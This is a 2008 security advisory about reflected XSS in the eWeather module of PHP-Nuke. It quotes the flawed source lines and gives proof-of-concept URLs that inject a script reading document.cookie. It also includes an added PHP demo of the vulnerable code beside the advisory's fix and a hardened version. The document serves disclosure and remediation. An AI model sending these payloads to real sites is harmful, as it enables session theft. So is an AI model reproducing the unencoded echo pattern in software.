Computer Security
[EN] securityvulns.ru

From: nima_501_(at)_yahoo.com <nima_501_(at)_yahoo.com>
Date: 13.03.2008
Subject: XSS in PHP-Nuke (eWeather module)

//////////XSS in PHP-Nuke (eWeather module)

PHP-Nuke (http://phpnuke.org):

       PHP-Nuke is an automated news system designed for use on intranets and
the Internet. The administrator has total control over the web site and its
registered users, and has at hand a powerful set of tools for maintaining an
active, fully interactive, database-driven web site.

eWeather module (http://www.janitorialservice.us):

       A weather module based on eWeather.biz data, with three additional
blocks: two side blocks and one center block.

///Details

From source-code of /modules/eWeather/index.php

Line 35: $zipCode=$chart;

Line 47: echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>";

The "chart" parameter comes straight from the request, is copied into $zipCode on line 35 and echoed into the HTML on line 47 without any validation or output encoding, so an attacker can reflect arbitrary script into the page (reflected XSS).

///Exploit
http://example.net/modules.php?name=eWeather&chart=[XSS]
http://example.net/modules.php?name=eWeather&chart=%3Cscript%3Ealert(document.cookie)%3C/script%3E

///Fix
Change line 35 to "$zipCode=(int)$chart;"

The cast leaves only digits in the output, which removes the injection. Note that it also drops leading zeros (a ZIP code such as 02134 becomes 2134), so a stricter fix is to accept only a five-digit string and HTML-encode the value on output.
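The following is an added example, not code from the eWeather module or from PHP-Nuke. It reproduces the two lines quoted above in a stand-alone script (assuming, as in the module, that the "chart" query parameter is copied into $chart), puts the advisory's (int) fix next to it, and adds a hardened variant that allow-lists exactly five digits and HTML-encodes the value at the output point. The three sample requests are constructed for the demonstration.

```php
<?php
// Added example, not part of the eWeather module or PHP-Nuke.
// Simulates the advisory's lines 35 and 47: a request parameter "chart"
// is copied into $zipCode and echoed into an <h2>.

// Vulnerable: mirrors the original code, no validation, no encoding.
function render_vulnerable(array $get): string
{
    $chart   = $get['chart'] ?? '';
    $zipCode = $chart;
    return "<div align=\"center\"><h2>USA weather for zip code $zipCode</h2>";
}

// The advisory's proposed fix: cast to int. The output can then only contain
// digits (or a minus sign), so no markup survives, but a ZIP code with a
// leading zero such as 02134 is rendered as 2134.
function render_int_cast(array $get): string
{
    $chart   = $get['chart'] ?? '';
    $zipCode = (int)$chart;
    return "<div align=\"center\"><h2>USA weather for zip code $zipCode</h2>";
}

// Hardened variant (our suggestion, not the module's): accept exactly five
// digits, reject everything else, and still encode at the output point so the
// sink is safe even if the validation is later relaxed.
function render_hardened(array $get): string
{
    $chart = $get['chart'] ?? '';
    if (!preg_match('/^\d{5}$/', $chart)) {
        return '<div align="center"><h2>Invalid zip code</h2>';
    }
    $zipCode = htmlspecialchars($chart, ENT_QUOTES, 'UTF-8');
    return "<div align=\"center\"><h2>USA weather for zip code $zipCode</h2>";
}

// Constructed sample requests (not captured traffic).
$samples = [
    'benign'       => ['chart' => '90210'],
    'leading_zero' => ['chart' => '02134'],
    'xss_payload'  => ['chart' => '<script>alert(document.cookie)</script>'],
];

foreach ($samples as $label => $get) {
    echo "== $label ==\n";
    echo 'vulnerable: ', render_vulnerable($get), "\n";
    echo 'int cast:   ', render_int_cast($get), "\n";
    echo 'hardened:   ', render_hardened($get), "\n";
}
```

Run it with `php example.php`: the vulnerable renderer emits the script tag verbatim, the (int) version prints "2134" for the leading-zero case, and the hardened version keeps "02134" intact while rejecting the payload outright.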

///Author:
NetJackal

http://netjackal.by.ru
http://hackerz.ir

© SecurityVulns, 3APA3A, Vladimir Dubrovin